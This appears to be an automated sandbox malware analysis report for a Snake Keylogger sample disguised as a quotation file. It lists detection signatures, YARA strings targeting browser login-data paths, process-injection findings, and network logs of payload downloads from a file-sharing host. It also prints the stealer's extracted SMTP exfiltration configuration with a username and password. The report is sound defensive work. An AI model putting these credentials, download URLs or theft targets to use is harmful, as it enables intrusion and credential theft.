Edit tour

Windows Analysis Report
QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Overview

General Information

Sample name:	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe renamed because original name is a hash value
Original sample name:	QUOTATION_NOVQTRA071244PDF.scr.exe
Analysis ID:	1560140
MD5:	c62fb9bd9189ed019db81d5cec1ee11b
SHA1:	1eda85cc204de90b33edddb1d8dfdf59a3dae847
SHA256:	9c891264b004f469657e84658ba1d82d2365d9a76cfe7e18cefb2a8e0ccdb1a3
Tags:	exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Creates a thread in another existing process (thread injection)

Initial sample is a PE file and has a suspicious name

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe" MD5: C62FB9BD9189ED019DB81D5CEC1EE11B)

aspnet_compiler.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)

conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "abbgets@qlststv.com", "Password": "ABBjy5ce)hyxmj99w", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2638636004.000001195F083000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2b80:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x60b6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b692:$a1: get_encryptedPassword 0x1b97e:$a2: get_encryptedUsername 0x1b49e:$a3: get_timePasswordChanged 0x1b599:$a4: get_passwordField 0x1b6a8:$a5: set_encryptedPassword 0x1cc9c:$a7: get_logins 0x1cbff:$a10: KeyLoggerEventArgs 0x1c898:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1efbc:$x1: $%SMTPDV$ 0x1f022:$x2: $#TheHashHere%& 0x20651:$x3: %FTPDV$ 0x2073b:$x4: $%TelegramDv$ 0x1c898:$x5: KeyLoggerEventArgs 0x1cbff:$x5: KeyLoggerEventArgs 0x20675:$m2: Clipboard Logs ID 0x2088b:$m2: Screenshot Logs ID 0x2099b:$m2: keystroke Logs ID 0x20c75:$m3: SnakePW 0x20863:$m4: \SnakeKeylogger\
00000004.00000002.3319881103.000001F59FBCB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21b08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x2503e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145aa:$a1: get_encryptedPassword 0x14896:$a2: get_encryptedUsername 0x143b6:$a3: get_timePasswordChanged 0x144b1:$a4: get_passwordField 0x145c0:$a5: set_encryptedPassword 0x15bb4:$a7: get_logins 0x15b17:$a10: KeyLoggerEventArgs 0x157b0:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bf4f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b181:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b5b4:$a4: \Orbitum\User Data\Default\Login Data 0x1c5f3:$a5: \Kometa\User Data\Default\Login Data
00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1513c:$s1: UnHook 0x15143:$s2: SetHook 0x1514b:$s3: CallNextHook 0x15158:$s4: _hook
00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17ed4:$x1: $%SMTPDV$ 0x17f3a:$x2: $#TheHashHere%& 0x19569:$x3: %FTPDV$ 0x19653:$x4: $%TelegramDv$ 0x157b0:$x5: KeyLoggerEventArgs 0x15b17:$x5: KeyLoggerEventArgs 0x1958d:$m2: Clipboard Logs ID 0x197a3:$m2: Screenshot Logs ID 0x198b3:$m2: keystroke Logs ID 0x19b8d:$m3: SnakePW 0x1977b:$m4: \SnakeKeylogger\
00000000.00000002.2653712164.00000119775B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x222f0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x25826:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe PID: 2132	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6176	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6176	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6176	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x20580:$a1: get_encryptedPassword 0x453ae:$a1: get_encryptedPassword 0x20862:$a2: get_encryptedUsername 0x45690:$a2: get_encryptedUsername 0x20396:$a3: get_timePasswordChanged 0x451c4:$a3: get_timePasswordChanged 0x20491:$a4: get_passwordField 0x452bf:$a4: get_passwordField 0x20596:$a5: set_encryptedPassword 0x453c4:$a5: set_encryptedPassword 0x229ab:$a7: get_logins 0x477d9:$a7: get_logins 0x2290e:$a10: KeyLoggerEventArgs 0x4773c:$a10: KeyLoggerEventArgs 0x225a7:$a11: KeyLoggerEventArgsEventHandler 0x473d5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: aspnet_compiler.exe PID: 6176	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x225a7:$x5: KeyLoggerEventArgs 0x2290e:$x5: KeyLoggerEventArgs 0x231fc:$x5: KeyLoggerEventArgs 0x23530:$x5: KeyLoggerEventArgs 0x473d5:$x5: KeyLoggerEventArgs 0x4773c:$x5: KeyLoggerEventArgs 0x4802a:$x5: KeyLoggerEventArgs 0x4835e:$x5: KeyLoggerEventArgs 0x24afa:$m2: Clipboard Logs ID 0x24bec:$m2: Screenshot Logs ID 0x24c42:$m2: keystroke Logs ID 0x49928:$m2: Clipboard Logs ID 0x49a1a:$m2: Screenshot Logs ID 0x49a70:$m2: keystroke Logs ID 0x24d77:$m3: SnakePW 0x49ba5:$m3: SnakePW 0x24bd8:$m4: \SnakeKeylogger\ 0x49a06:$m4: \SnakeKeylogger\
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.119775b0000.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196edbfa50.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x127aa:$a1: get_encryptedPassword 0x12a96:$a2: get_encryptedUsername 0x125b6:$a3: get_timePasswordChanged 0x126b1:$a4: get_passwordField 0x127c0:$a5: set_encryptedPassword 0x13db4:$a7: get_logins 0x13d17:$a10: KeyLoggerEventArgs 0x139b0:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a14f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19381:$a3: \Google\Chrome\User Data\Default\Login Data 0x197b4:$a4: \Orbitum\User Data\Default\Login Data 0x1a7f3:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1333c:$s1: UnHook 0x13343:$s2: SetHook 0x1334b:$s3: CallNextHook 0x13358:$s4: _hook
4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x160d4:$x1: $%SMTPDV$ 0x1613a:$x2: $#TheHashHere%& 0x17769:$x3: %FTPDV$ 0x17853:$x4: $%TelegramDv$ 0x139b0:$x5: KeyLoggerEventArgs 0x13d17:$x5: KeyLoggerEventArgs 0x1778d:$m2: Clipboard Logs ID 0x179a3:$m2: Screenshot Logs ID 0x17ab3:$m2: keystroke Logs ID 0x17d8d:$m3: SnakePW 0x1797b:$m4: \SnakeKeylogger\
4.2.aspnet_compiler.exe.1f59e080000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.aspnet_compiler.exe.1f59e080000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.1f59e080000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x127aa:$a1: get_encryptedPassword 0x12a96:$a2: get_encryptedUsername 0x125b6:$a3: get_timePasswordChanged 0x126b1:$a4: get_passwordField 0x127c0:$a5: set_encryptedPassword 0x13db4:$a7: get_logins 0x13d17:$a10: KeyLoggerEventArgs 0x139b0:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.1f59e080000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a14f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19381:$a3: \Google\Chrome\User Data\Default\Login Data 0x197b4:$a4: \Orbitum\User Data\Default\Login Data 0x1a7f3:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.1f59e080000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1333c:$s1: UnHook 0x13343:$s2: SetHook 0x1334b:$s3: CallNextHook 0x13358:$s4: _hook
4.2.aspnet_compiler.exe.1f59e080000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x160d4:$x1: $%SMTPDV$ 0x1613a:$x2: $#TheHashHere%& 0x17769:$x3: %FTPDV$ 0x17853:$x4: $%TelegramDv$ 0x139b0:$x5: KeyLoggerEventArgs 0x13d17:$x5: KeyLoggerEventArgs 0x1778d:$m2: Clipboard Logs ID 0x179a3:$m2: Screenshot Logs ID 0x17ab3:$m2: keystroke Logs ID 0x17d8d:$m3: SnakePW 0x1797b:$m4: \SnakeKeylogger\
4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145aa:$a1: get_encryptedPassword 0x14896:$a2: get_encryptedUsername 0x143b6:$a3: get_timePasswordChanged 0x144b1:$a4: get_passwordField 0x145c0:$a5: set_encryptedPassword 0x15bb4:$a7: get_logins 0x15b17:$a10: KeyLoggerEventArgs 0x157b0:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bf4f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b181:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b5b4:$a4: \Orbitum\User Data\Default\Login Data 0x1c5f3:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1513c:$s1: UnHook 0x15143:$s2: SetHook 0x1514b:$s3: CallNextHook 0x15158:$s4: _hook
4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17ed4:$x1: $%SMTPDV$ 0x17f3a:$x2: $#TheHashHere%& 0x19569:$x3: %FTPDV$ 0x19653:$x4: $%TelegramDv$ 0x157b0:$x5: KeyLoggerEventArgs 0x15b17:$x5: KeyLoggerEventArgs 0x1958d:$m2: Clipboard Logs ID 0x197a3:$m2: Screenshot Logs ID 0x198b3:$m2: keystroke Logs ID 0x19b8d:$m3: SnakePW 0x1977b:$m4: \SnakeKeylogger\
4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145aa:$a1: get_encryptedPassword 0x14896:$a2: get_encryptedUsername 0x143b6:$a3: get_timePasswordChanged 0x144b1:$a4: get_passwordField 0x145c0:$a5: set_encryptedPassword 0x15bb4:$a7: get_logins 0x15b17:$a10: KeyLoggerEventArgs 0x157b0:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bf4f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b181:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b5b4:$a4: \Orbitum\User Data\Default\Login Data 0x1c5f3:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1513c:$s1: UnHook 0x15143:$s2: SetHook 0x1514b:$s3: CallNextHook 0x15158:$s4: _hook
4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17ed4:$x1: $%SMTPDV$ 0x17f3a:$x2: $#TheHashHere%& 0x19569:$x3: %FTPDV$ 0x19653:$x4: $%TelegramDv$ 0x157b0:$x5: KeyLoggerEventArgs 0x15b17:$x5: KeyLoggerEventArgs 0x1958d:$m2: Clipboard Logs ID 0x197a3:$m2: Screenshot Logs ID 0x198b3:$m2: keystroke Logs ID 0x19b8d:$m3: SnakePW 0x1977b:$m4: \SnakeKeylogger\
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, ParentProcessId: 2132, ParentProcessName: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 6176, ProcessName: aspnet_compiler.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T13:09:03.727519+0100	2803305	3	Unknown Traffic	192.168.2.5	49822	188.114.97.3	443	TCP
2024-11-21T13:09:06.755451+0100	2803305	3	Unknown Traffic	192.168.2.5	49829	188.114.97.3	443	TCP
2024-11-21T13:09:18.683967+0100	2803305	3	Unknown Traffic	192.168.2.5	49862	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T13:08:58.651241+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49806	193.122.130.0	80	TCP
2024-11-21T13:09:02.088850+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49806	193.122.130.0	80	TCP
2024-11-21T13:09:05.088823+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49825	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "abbgets@qlststv.com", "Password": "ABBjy5ce)hyxmj99w", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Multi AV Scanner detection for submitted file

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49811 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF848FEA235h	4_2_00007FF848FE9E4D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF848FE9C1Bh	4_2_00007FF848FE99B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF848FEA235h	4_2_00007FF848FEA151

Source: global traffic	HTTP traffic detected: GET /data-package/u7ghXEYp/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/72vwG3nYeuAb HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/u7ghXEYp/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49825 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49806 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49829 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49822 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49862 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
